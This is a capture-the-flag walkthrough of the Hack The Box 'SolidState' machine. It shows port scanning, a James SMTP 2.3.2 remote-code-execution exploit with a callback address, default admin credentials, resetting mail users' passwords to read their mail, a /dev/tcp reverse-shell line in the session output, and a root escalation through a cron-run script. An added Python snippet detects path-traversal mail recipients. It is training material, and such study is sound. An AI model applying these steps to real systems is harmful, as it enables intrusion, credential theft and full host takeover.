1 Information Gathering
NMAP
┌──(root㉿serven)-[~]
└─# nmap -p 0-65535 -A 10.129.224.177
Starting Nmap 7.92 ( https://nmap.org ) at 2024-06-05 00:52 CST
Host is up (0.063s latency).
Not shown: 65530 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)
| ssh-hostkey:
| 2048 77:00:84:f5:78:b9:c7:d3:54:cf:71:2e:0d:52:6d:8b (RSA)
| 256 78:b8:3a:f6:60:19:06:91:f5:53:92:1d:3f:48:ed:53 (ECDSA)
|_ 256 e4:45:e9:ed:07:4d:73:69:43:5a:12:70:9d:c4:af:76 (ED25519)
25/tcp open smtp?
|_smtp-commands: Couldn't establish connection on port 25
80/tcp open http Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Home - Solid State Security
110/tcp open pop3?
|_tls-alpn: ERROR: Script execution failed (use -d to debug)
|_ssl-cert: ERROR: Script execution failed (use -d to debug)
|_ssl-date: ERROR: Script execution failed (use -d to debug)
|_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug)
|_sslv2: ERROR: Script execution failed (use -d to debug)
119/tcp open nntp?
|_sslv2: ERROR: Script execution failed (use -d to debug)
|_tls-alpn: ERROR: Script execution failed (use -d to debug)
|_ssl-cert: ERROR: Script execution failed (use -d to debug)
|_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug)
|_ssl-date: ERROR: Script execution failed (use -d to debug)
4555/tcp open rsip?
Device type: firewall
Running (JUST GUESSING): Fortinet embedded (90%)
OS CPE: cpe:/h:fortinet:fortigate_200b
Aggressive OS guesses: Fortinet FortiGate 200B firewall (90%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 0.29 ms 10.129.224.177
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8353.87 seconds
- 22 – SSH service
- 25 – SMTP service
- 80 – Apache web server
- 110 – POP3, used together with the SMTP server to send and receive email
- 119 – NNTP (Network News Transfer Protocol), used to transfer Usenet news articles (netnews) between news servers so that end-user client applications can post and read them
- 4555 – RSIP (nmap's guess); here it is used to list and manage the SMTP server's users
Port 80
The site consists mostly of static pages with no exploitable functionality.
Directory scanning
The directories found contain nothing exploitable.
Ports 25, 110, 119, 4555
telnet 10.129.254.59 25
The banner reveals James SMTP 2.3.2; next, search for known vulnerabilities in James 2.3.2.
James 2.3.2 exploit
The script runs to completion, and its output says the listener will only receive a shell once someone logs in over SSH. Since no SSH credentials are known yet, the next step is to look for a username and password that allow an SSH login.
python3 50347.py 10.129.254.59 10.10.14.25 4444
SSH credential testing
Port 4555 is the James remote administration port. Trying it with the default credentials root:root succeeds: the default credentials are still in place.
The banner says the HELP command lists the available commands.
listusers command: lists the accounts james, thomas, john, mindy and mailadmin.
setpassword command: changes a user's password; as root it can change any other user's password.
Reading each user's mailbox over port 110: john has one email and mindy has two.
mindy's second email contains mindy:P@55W0rd1!2@, to be used for SSH access.
SSH login with the credentials
(base) gryphon@wsdl HTB %ssh mindy@10.129.254.59
mindy@10.129.254.59's password:
Linux solidstate 4.9.0-3-686-pae #1 SMP Debian 4.9.30-2+deb9u3 (2017-08-06) i686
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed Jun 5 00:48:32 2024 from 10.10.14.25
-rbash: $'\254\355\005sr\036org.apache.james.core.MailImpl\304x\r\345\274\317ݬ\003': command not found
-rbash: L: command not found
-rbash: attributestLjava/util/HashMap: No such file or directory
-rbash: L
errorMessagetLjava/lang/String: No such file or directory
-rbash: L
lastUpdatedtLjava/util/Date: No such file or directory
-rbash: Lmessaget!Ljavax/mail/internet/MimeMessage: No such file or directory
-rbash: $'L\004nameq~\002L': command not found
-rbash: recipientstLjava/util/Collection: No such file or directory
-rbash: L: command not found
-rbash: $'remoteAddrq~\002L': command not found
-rbash: remoteHostq~LsendertLorg/apache/mailet/MailAddress: No such file or directory
-rbash: $'L\005stateq~\002xpsr\035org.apache.mailet.MailAddress': command not found
-rbash: $'\221\222\204m\307{\244\002\003I\003posL\004hostq~\002L\004userq~\002xp': command not found
-rbash: @team.pl>
Message-ID: <32339690.0.1717559978216.JavaMail.root@solidstate>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Delivered-To: ../../../../../../../../etc/bash_completion.d@localhost
Received: from 10.10.14.25 ([10.10.14.25])
by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 1016
for <../../../../../../../../etc/bash_completion.d@localhost>;
Tue, 4 Jun 2024 23:58:47 -0400 (EDT)
Date: Tue, 4 Jun 2024 23:58:47 -0400 (EDT)
From: team@team.pl
: No such file or directory
-rbash: connect: Connection refused
-rbash: /dev/tcp/10.10.14.25/4444: Connection refused
-rbash: $'\r': command not found
mindy@solidstate:~$
This SSH session is restricted (rbash), so many commands cannot be run.
However, the James 2.3.2 RCE output said a shell would be spawned at SSH login; checking the listener started earlier confirms that a shell was indeed received.
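As an added defensive example (not part of the original writeup), a small Python checker that flags recipient addresses used as file paths, the pattern visible in the Delivered-To and Received headers echoed above. The sample header block is constructed from that session output; a mail gateway or log pipeline could run the same check on RCPT TO values before they reach a James 2.3.2 host.

```python
import re

# Constructed sample, modelled on the headers echoed by rbash above;
# both the Delivered-To header and the Received "for" clause carry the
# traversal recipient that James 2.3.2 turned into a file path.
SAMPLE_HEADERS = """\
Delivered-To: ../../../../../../../../etc/bash_completion.d@localhost
Received: from 10.10.14.25 ([10.10.14.25])
    by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 1016
    for <../../../../../../../../etc/bash_completion.d@localhost>;
    Tue, 4 Jun 2024 23:58:47 -0400 (EDT)
From: team@team.pl
"""

# Recipient values appear after "Delivered-To:" or inside "for <...>".
RECIPIENT_RE = re.compile(r"(?:Delivered-To:\s*|for\s+<)([^\s<>;]+)")
# A ".." path segment on its own; separators and NUL bytes are checked
# separately because any of them turns a mailbox name into a path.
TRAVERSAL_RE = re.compile(r"(?:^|[/\\])\.\.(?:[/\\]|$)")


def is_suspicious_recipient(address: str) -> bool:
    """True when the local part could escape the mailbox directory."""
    localpart = address.rsplit("@", 1)[0]
    if "\x00" in localpart or "/" in localpart or "\\" in localpart:
        return True
    return bool(TRAVERSAL_RE.search(localpart))


def flag_traversal(headers: str) -> list:
    """Return the unique suspicious recipients found in a header block."""
    flagged = []
    for address in RECIPIENT_RE.findall(headers):
        if is_suspicious_recipient(address) and address not in flagged:
            flagged.append(address)
    return flagged


if __name__ == "__main__":
    for hit in flag_traversal(SAMPLE_HEADERS):
        print("traversal in recipient:", hit)
```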
2 Privilege Escalation
Information gathering with LinEnum.sh
/opt contains tmp.py, which is run as root every 3 minutes. Writing a reverse shell into tmp.py yields a root reverse shell within three minutes.